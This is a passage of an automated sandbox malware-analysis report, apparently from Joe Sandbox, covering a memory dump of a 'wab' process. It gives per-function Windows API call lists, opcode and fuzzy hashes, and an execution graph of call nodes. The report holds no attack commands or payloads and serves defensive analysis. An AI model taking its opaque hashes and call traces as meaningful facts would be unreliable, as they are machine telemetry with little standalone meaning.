                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00402FD7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                  • strlen.MSVCRT ref: 00403006
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  • API String ID: 764393265-0
                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$System$File$LocalSpecific
                                                  • String ID:
                                                  • API String ID: 979780441-0
                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcpy.MSVCRT ref: 004134E0
                                                  • memcpy.MSVCRT ref: 004134F2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  • API String ID: 1386444988-0
                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: d=E
                                                  • API String ID: 909852535-3703654223
                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040F79E
                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                  • memcpy.MSVCRT ref: 0040C024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 3988819677-2008345750
                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040E770
                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: F^@
                                                  • API String ID: 568519121-3652327722
                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2773794195-880857682
                                                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcmp.MSVCRT ref: 00408AF3
                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                  • memcmp.MSVCRT ref: 00408B2B
                                                  • memcmp.MSVCRT ref: 00408B5C
                                                  • memcpy.MSVCRT ref: 00408B79
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID:
                                                  • API String ID: 231171946-0
                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcslen$wcscat$wcscpy
                                                  • String ID:
                                                  • API String ID: 1961120804-0
                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:2.3%
                                                  Dynamic/Decrypted Code Coverage:20.9%
                                                  Signature Coverage:0.5%
                                                  Total number of Nodes:829
                                                  Total number of Limit Nodes:16
                                                  execution_graph 33805 40fc40 70 API calls 33978 403640 21 API calls 33806 427fa4 42 API calls 33979 412e43 _endthreadex 33980 425115 76 API calls __fprintf_l 33981 43fe40 133 API calls 33809 425115 83 API calls __fprintf_l 33810 401445 memcpy memcpy DialogBoxParamA 33811 440c40 34 API calls 32939 444c4a 32958 444e38 32939->32958 32941 444c56 GetModuleHandleA 32942 444c68 __set_app_type __p__fmode __p__commode 32941->32942 32944 444cfa 32942->32944 32945 444d02 __setusermatherr 32944->32945 32946 444d0e 32944->32946 32945->32946 32959 444e22 _controlfp 32946->32959 32948 444d13 _initterm __getmainargs _initterm 32949 444d6a GetStartupInfoA 32948->32949 32951 444d9e GetModuleHandleA 32949->32951 32960 40cf44 32951->32960 32955 444dcf _cexit 32957 444e04 32955->32957 32956 444dc8 exit 32956->32955 32958->32941 32959->32948 33011 404a99 LoadLibraryA 32960->33011 32962 40cf60 32997 40cf64 32962->32997 33018 410d0e 32962->33018 32964 40cf6f 33022 40ccd7 ??2@YAPAXI 32964->33022 32966 40cf9b 33036 407cbc 32966->33036 32971 40cfc4 33054 409825 memset 32971->33054 32972 40cfd8 33059 4096f4 memset 32972->33059 32977 40d181 ??3@YAXPAX 32979 40d1b3 32977->32979 32980 40d19f DeleteObject 32977->32980 32978 407e30 _strcmpi 32981 40cfee 32978->32981 33083 407948 ??3@YAXPAX ??3@YAXPAX 32979->33083 32980->32979 32983 40cff2 RegDeleteKeyA 32981->32983 32984 40d007 EnumResourceTypesA 32981->32984 32983->32977 32986 40d047 32984->32986 32987 40d02f MessageBoxA 32984->32987 32985 40d1c4 33084 4080d4 ??3@YAXPAX 32985->33084 32989 40d0a0 CoInitialize 32986->32989 33064 40ce70 32986->33064 32987->32977 33081 40cc26 strncat memset RegisterClassA CreateWindowExA 32989->33081 32991 40d1cd 33085 407948 ??3@YAXPAX ??3@YAXPAX 32991->33085 32993 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33082 40c256 PostMessageA 32993->33082 32997->32955 32997->32956 32998 40d061 ??3@YAXPAX 32998->32979 33001 40d084 DeleteObject 32998->33001 32999 40d09e 32999->32989 33001->32979 33003 40d0f9 GetMessageA 33004 40d17b 33003->33004 33005 40d10d 33003->33005 33004->32977 33006 40d113 TranslateAccelerator 33005->33006 33008 40d145 IsDialogMessage 33005->33008 33009 40d139 IsDialogMessage 33005->33009 33006->33005 33007 40d16d GetMessageA 33006->33007 33007->33004 33007->33006 33008->33007 33010 40d157 TranslateMessage DispatchMessageA 33008->33010 33009->33007 33009->33008 33010->33007 33012 404ac4 GetProcAddress 33011->33012 33015 404ae8 33011->33015 33013 404ad4 33012->33013 33014 404add FreeLibrary 33012->33014 33013->33014 33014->33015 33016 404b13 33015->33016 33017 404afc MessageBoxA 33015->33017 33016->32962 33017->32962 33019 410d17 LoadLibraryA 33018->33019 33020 410d3c 33018->33020 33019->33020 33021 410d2b GetProcAddress 33019->33021 33020->32964 33021->33020 33023 40cd08 ??2@YAPAXI 33022->33023 33025 40cd26 33023->33025 33026 40cd2d 33023->33026 33093 404025 6 API calls 33025->33093 33028 40cd66 33026->33028 33029 40cd59 DeleteObject 33026->33029 33086 407088 33028->33086 33029->33028 33031 40cd6b 33089 4019b5 33031->33089 33034 4019b5 strncat 33035 40cdbf _mbscpy 33034->33035 33035->32966 33095 407948 ??3@YAXPAX ??3@YAXPAX 33036->33095 33038 407cf7 33041 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33038->33041 33042 407ddc 33038->33042 33044 407d7a ??3@YAXPAX 33038->33044 33049 407e04 33038->33049 33099 40796e 7 API calls 33038->33099 33100 406f30 33038->33100 33041->33038 33042->33049 33108 407a1f 33042->33108 33044->33038 33096 407a55 33049->33096 33050 407e30 33051 407e57 33050->33051 33052 407e38 33050->33052 33051->32971 33051->32972 33052->33051 33053 407e41 _strcmpi 33052->33053 33053->33051 33053->33052 33114 4097ff 33054->33114 33056 409854 33119 409731 33056->33119 33060 4097ff 3 API calls 33059->33060 33061 409723 33060->33061 33139 40966c 33061->33139 33153 4023b2 33064->33153 33070 40ced3 33242 40cdda 7 API calls 33070->33242 33071 40cece 33075 40cf3f 33071->33075 33194 40c3d0 memset GetModuleFileNameA strrchr 33071->33194 33075->32998 33075->32999 33077 40ceed 33221 40affa 33077->33221 33081->32993 33082->33003 33083->32985 33084->32991 33085->32997 33094 406fc7 memset _mbscpy 33086->33094 33088 40709f CreateFontIndirectA 33088->33031 33090 4019e1 33089->33090 33091 4019c2 strncat 33090->33091 33092 4019e5 memset LoadIconA 33090->33092 33091->33090 33092->33034 33093->33026 33094->33088 33095->33038 33097 407a65 33096->33097 33098 407a5b ??3@YAXPAX 33096->33098 33097->33050 33098->33097 33099->33038 33101 406f37 malloc 33100->33101 33102 406f7d 33100->33102 33104 406f73 33101->33104 33105 406f58 33101->33105 33102->33038 33104->33038 33106 406f6c ??3@YAXPAX 33105->33106 33107 406f5c memcpy 33105->33107 33106->33104 33107->33106 33109 407a38 33108->33109 33110 407a2d ??3@YAXPAX 33108->33110 33112 406f30 3 API calls 33109->33112 33111 407a43 33110->33111 33113 40796e 7 API calls 33111->33113 33112->33111 33113->33049 33130 406f96 GetModuleFileNameA 33114->33130 33116 409805 strrchr 33117 409814 33116->33117 33118 409817 _mbscat 33116->33118 33117->33118 33118->33056 33131 44b090 33119->33131 33124 40930c 3 API calls 33125 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33124->33125 33126 4097c5 LoadStringA 33125->33126 33127 4097db 33126->33127 33127->33126 33129 4097f3 33127->33129 33138 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33127->33138 33129->32977 33130->33116 33132 40973e _mbscpy _mbscpy 33131->33132 33133 40930c 33132->33133 33134 44b090 33133->33134 33135 409319 memset GetPrivateProfileStringA 33134->33135 33136 409374 33135->33136 33137 409364 WritePrivateProfileStringA 33135->33137 33136->33124 33137->33136 33138->33127 33149 406f81 GetFileAttributesA 33139->33149 33141 409675 33142 4096ee 33141->33142 33143 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33141->33143 33142->32978 33150 409278 GetPrivateProfileStringA 33143->33150 33145 4096c9 33151 409278 GetPrivateProfileStringA 33145->33151 33147 4096da 33152 409278 GetPrivateProfileStringA 33147->33152 33149->33141 33150->33145 33151->33147 33152->33142 33244 409c1c 33153->33244 33156 401e69 memset 33283 410dbb 33156->33283 33159 401ec2 33313 4070e3 strlen _mbscat _mbscpy _mbscat 33159->33313 33160 401ed4 33298 406f81 GetFileAttributesA 33160->33298 33163 401ee6 strlen strlen 33165 401f15 33163->33165 33166 401f28 33163->33166 33314 4070e3 strlen _mbscat _mbscpy _mbscat 33165->33314 33299 406f81 GetFileAttributesA 33166->33299 33169 401f35 33300 401c31 33169->33300 33172 401f75 33312 410a9c RegOpenKeyExA 33172->33312 33174 401c31 7 API calls 33174->33172 33175 401f91 33176 402187 33175->33176 33177 401f9c memset 33175->33177 33179 402195 ExpandEnvironmentStringsA 33176->33179 33180 4021a8 _strcmpi 33176->33180 33315 410b62 RegEnumKeyExA 33177->33315 33324 406f81 GetFileAttributesA 33179->33324 33180->33070 33180->33071 33182 40217e RegCloseKey 33182->33176 33183 401fd9 atoi 33184 401fef memset memset sprintf 33183->33184 33192 401fc9 33183->33192 33316 410b1e 33184->33316 33187 402165 33187->33182 33188 402076 memset memset strlen strlen 33188->33192 33189 4020dd strlen strlen 33189->33192 33190 4070e3 strlen _mbscat _mbscpy _mbscat 33190->33192 33191 406f81 GetFileAttributesA 33191->33192 33192->33182 33192->33183 33192->33187 33192->33188 33192->33189 33192->33190 33192->33191 33193 402167 _mbscpy 33192->33193 33323 410b62 RegEnumKeyExA 33192->33323 33193->33182 33195 40c422 33194->33195 33196 40c425 _mbscat _mbscpy _mbscpy 33194->33196 33195->33196 33197 40c49d 33196->33197 33198 40c512 33197->33198 33199 40c502 GetWindowPlacement 33197->33199 33200 40c538 33198->33200 33345 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33198->33345 33199->33198 33338 409b31 33200->33338 33204 40ba28 33205 40ba87 33204->33205 33209 40ba3c 33204->33209 33348 406c62 LoadCursorA SetCursor 33205->33348 33207 40ba8c 33349 404734 33207->33349 33357 403c16 33207->33357 33433 404785 33207->33433 33436 410a9c RegOpenKeyExA 33207->33436 33437 4107f1 33207->33437 33208 40ba43 _mbsicmp 33208->33209 33209->33205 33209->33208 33440 40b5e5 10 API calls 33209->33440 33210 40baa0 33211 407e30 _strcmpi 33210->33211 33212 40bab0 33211->33212 33213 40bafa SetCursor 33212->33213 33215 40baf1 qsort 33212->33215 33213->33077 33215->33213 33798 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33221->33798 33223 40b00e 33224 40b016 33223->33224 33225 40b01f GetStdHandle 33223->33225 